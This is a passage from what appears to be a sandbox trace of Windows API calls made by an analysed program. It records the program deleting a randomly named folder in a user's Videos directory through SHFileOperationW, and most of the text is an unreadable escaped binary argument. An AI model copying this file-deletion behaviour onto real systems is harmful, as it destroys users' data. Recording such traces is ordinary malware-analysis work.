lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8", lpFilePart=0x8bf658*="o7xXPd8") returned 0x2c [0258.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0258.813] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8")) returned 0x10 [0258.813] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xd